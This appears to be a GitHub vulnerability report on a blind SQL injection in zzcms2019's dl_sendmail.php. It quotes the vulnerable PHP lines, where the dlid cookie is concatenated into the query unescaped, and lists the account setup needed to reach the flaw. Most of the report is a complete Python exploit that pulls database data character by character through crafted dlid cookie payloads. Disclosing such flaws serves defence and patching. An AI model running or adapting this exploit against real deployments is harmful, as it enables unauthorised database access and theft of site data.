Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

zzcms2019 SQL injection vulnerability in dl_sendmail.php

Build test environment locally to run zzcms2019

The vulnerability is at line 71 of /dl/dl_sendmail.php, and the key code is

If (strpos (@ $_COOKIE [' dlid], ", ") > 0) {

$SQL ="select email from zzcms_dl where passed=1 and id in (".@$_COOKIE['dlid'].") order by id asc limit $n,$size";

} else {

$SQL ="select email from zzcms_dl where passed=1 and id='".@$_COOKIE['dlid']."'";

}

Here "and id in (".@$_COOKIE['dlid'].")"

No single quotation mark is used and no escape is needed, which results in the global escape of cookie of zzcms2019 is invalid and there is SQL blind injection vulnerability without single quotation mark

Conditions of use: the front desk register company type account, and then user center -> email/SMS content Settings -> add email/SMS content email -> set as the default

The test does not require additional user group permissions

Page returns without cookie injection

Construct payload access /dl/dl_sendmail.php for cookie injection, when the page returns

The complete exp is as follows

#coding: utf-8
import requests
import string

url = 'http://{}/dl/dl_sendmail.php'

#header 头,自己根据实际环境做修改
headers = {
'Host':'{}',
'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:68.0) Gecko/20100101 Firefox/68.0',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language':'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding':'gzip, deflate',
'Content-Type':'application/x-www-form-urlencoded',
'Connection':'keep-alive',
'Cookie':'{}'
}

def Sqli(host,sql):
	global url
	global headers
	url = url.format(host)
	sqli = "ascii(substr(({}),{},1)))={}"
	sqli_2 = "0,(if((({}),1,0)))#"
	res_data = ""
	s = requests.session()
	i = 1
	while 1:
		tmp_data = res_data
		for c in string.printable:
			tmp_header = headers['Cookie']
			sqli_data = sqli_2.format(sqli.format(sql,str(i),ord(c)))
			headers['Cookie'] = headers['Cookie'] + "; dlid=" + sqli_data
			res = s.get(url, headers=headers)
			if "</html>" not in res.text: #自己根据实际环境做修改
				headers['Cookie'] = tmp_header
				res_data += c
				print (res_data)
				break
			headers['Cookie'] = tmp_header
		i += 1
		if tmp_data == res_data:
			print ('完成')
			return 

if __name__ == "__main__":
	#设置 host 地址
	host = "127.0.0.1:9000"
	#设置用户 cookie
	user_cookie = "PHPSESSID=dh6bhd10g47tjc4jlhqf2leqnn; UserName=test; PassWord=343b1c4a3ea721b2d640fc8700db0f36"
	sql = "select group_concat(user(),version(),@@version_compile_os)"
	headers['Host'] = headers['Host'].format(host)
	headers['Cookie'] = headers['Cookie'].format(user_cookie)
	Sqli(host,sql)

Exp run result